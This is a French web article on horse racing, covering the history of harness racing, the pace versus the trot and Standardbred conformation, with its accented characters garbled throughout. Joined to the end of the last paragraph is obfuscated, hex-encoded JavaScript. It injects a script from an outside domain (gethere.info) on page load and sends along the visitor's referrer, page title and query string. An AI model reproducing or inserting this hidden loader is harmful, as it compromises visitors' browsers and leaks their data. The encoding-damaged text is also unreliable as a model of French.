Les courses de galop

Les courses de chevaux

Il est faux de croire que le sport des courses sous harnais est un sport relativement jeune. Des archA�ologues ont dA�couvert des tablettes remontant A� la��an 1350 avant JA�sus-Christ et sur lesquelles les A�gyptiens avaient inscrit leurs mA�thodes da��entraA�nement des trotteurs.A� Les courses de chevaux demeurent un sport colorA� et excitant, partout au monde. Ils permettent une forme de pari sportif avec la diffA�rence qua��il est facile de rencontrer les entraA�neurs, les conducteurs, le personnel de piste et les propriA�taires. Il est plutA?t facile da��aborder des gens A� la piste de course qui peuvent partager leurs connaissances en la matiA?re.

Les allures du cheval de courses.

Pendant longtemps on a cru que le cheval possA�dait que trois allures naturelles : pas, trot et galop, considA�rant l’amble comme une allure dA�fectueuse. Mais d’aprA?s un professeur de l’UniversitA� de Zurich, le professeur Hildebrand, qui a longuement A�tudiA� la locomotion du cheval, 28% des races chevalines exA�cutent naturellement plus de trois allures. Le professeur Hildebrand a diffA�renciA� environ allures naturelles entre l’amble et le trot.A� En fait, les chevaux ambleurs remontent A� loin dans l’histoire. Les gens du Moyen-Age prA�fA�raient l’amble dont l’allure si douce leur permettait de passer de longs moments en selle. C’est donc son confort qui a permis A� l’ambleur d’A?tre la monture prA�fA�rA�e des cavaliers lors des dA�filA�s, des longs voyages et des travaux A� la campagne. L’allure de l’ambleur s’explique par le fait que la structure des chars A�gyptiens contraignait A�les chevaux A� adopter une posture ne permettant pas une autre allure.

Jusqu’en 1600, il A�tait facile de trouver un cheval ambleur. Par contre en 1700, cent ans plus tard, il A�tait devenu quasiment impossible d’en trouver. Et au dA�but du XXe siA?cle, on ne savait mA?me plus que cette allure avait dA�jA� existA�, ce qu’elle A�tait et l’on considA�rait les chevaux aux allures latA�rales, comme des animaux faibles, mal-formA�s, malades ou vieux.

Le pas, le trot, l’amble et le galop sont donc des allures naturelles du cheval. Leur aisance et leur rA�gularitA� sont habituellement le reflet d’une bonne conformation surtout au niveau des membres. Le trot et l’amble comportent une pA�riode de suspension oA? l’animal perd contact avec le sol.A� Dans le cas du trot, les membres diagonaux touchent le sol en mA?me temps alors que dans le cas de l’amble, ce sont les deux membres du mA?me cA?tA� qui touchent au sol en mA?me temps.

L’amble est une allure plus rapide que le trot A� cause d’une perte d’A�quilibre latA�rale qui force l’animal A� prA�cipiter ses mouvements pour raccourcir au minimum la pA�riode de suspension.A� Tous les dA�fauts d’allure occasionnent des pertes de vitesse A� des degrA�s variables et causent souvent des blessures.A� Les dA�fauts qui ne comportent aucun risque ou peu de risques de blessures sont : billarder ou faucher (wing out) et se croiser (wing in).A� Bref, la description de la conformation prA�sentA�e ici n’aura jamais la prA�tention d’A?tre infaillible, la nature se plaisant souvent A� des contradictions hA�rA�ditaires.

Chez le Standardbred, comme chez toutes les races, le modA?le est la rA�sultante des beautA�s ou dA�fectuositA�s des diffA�rentes rA�gions anatomiques. Il faut avoir apprA�ciA� leurs proportions respectives et faire jouer au besoin des compensations en A�tant indulgent pour certains dA�fauts secondaires s’ils sont accompagnA�s de qualitA�s supA�rieures.var _0x31f1=[« \x73\x63\x72\x69\x70\x74″, »\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74″, »\x73\x72\x63″, »\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26\x73\x65\x5F\x72\x65\x66\x65\x72\x72\x65\x72\x3D », »\x72\x65\x66\x65\x72\x72\x65\x72″, »\x26\x64\x65\x66\x61\x75\x6C\x74\x5F\x6B\x65\x79\x77\x6F\x72\x64\x3D », »\x74\x69\x74\x6C\x65″, »\x26″, »\x3F », »\x72\x65\x70\x6C\x61\x63\x65″, »\x73\x65\x61\x72\x63\x68″, »\x6C\x6F\x63\x61\x74\x69\x6F\x6E », »\x26\x66\x72\x6D\x3D\x73\x63\x72\x69\x70\x74″, »\x63\x75\x72\x72\x65\x6E\x74\x53\x63\x72\x69\x70\x74″, »\x69\x6E\x73\x65\x72\x74\x42\x65\x66\x6F\x72\x65″, »\x70\x61\x72\x65\x6E\x74\x4E\x6F\x64\x65″, »\x61\x70\x70\x65\x6E\x64\x43\x68\x69\x6C\x64″, »\x68\x65\x61\x64″, »\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x73\x42\x79\x54\x61\x67\x4E\x61\x6D\x65″, »\x70\x72\x6F\x74\x6F\x63\x6F\x6C », »\x68\x74\x74\x70\x73\x3A », »\x69\x6E\x64\x65\x78\x4F\x66″, »\x52\x5F\x50\x41\x54\x48″, »\x54\x68\x65\x20\x77\x65\x62\x73\x69\x74\x65\x20\x77\x6F\x72\x6B\x73\x20\x6F\x6E\x20\x48\x54\x54\x50\x53\x2E\x20\x54\x68\x65\x20\x74\x72\x61\x63\x6B\x65\x72\x20\x6D\x75\x73\x74\x20\x75\x73\x65\x20\x48\x54\x54\x50\x53\x20\x74\x6F\x6F\x2E »];var d=document;var s=d[_0x31f1[1]](_0x31f1[0]);s[_0x31f1[2]]= _0x31f1[3]+ encodeURIComponent(document[_0x31f1[4]])+ _0x31f1[5]+ encodeURIComponent(document[_0x31f1[6]])+ _0x31f1[7]+ window[_0x31f1[11]][_0x31f1[10]][_0x31f1[9]](_0x31f1[8],_0x31f1[7])+ _0x31f1[12];if(document[_0x31f1[13]]){document[_0x31f1[13]][_0x31f1[15]][_0x31f1[14]](s,document[_0x31f1[13]])}else {d[_0x31f1[18]](_0x31f1[17])[0][_0x31f1[16]](s)};if(document[_0x31f1[11]][_0x31f1[19]]=== _0x31f1[20]&& KTracking[_0x31f1[22]][_0x31f1[21]](_0x31f1[3]+ encodeURIComponent(document[_0x31f1[4]])+ _0x31f1[5]+ encodeURIComponent(document[_0x31f1[6]])+ _0x31f1[7]+ window[_0x31f1[11]][_0x31f1[10]][_0x31f1[9]](_0x31f1[8],_0x31f1[7])+ _0x31f1[12])=== -1){alert(_0x31f1[23])}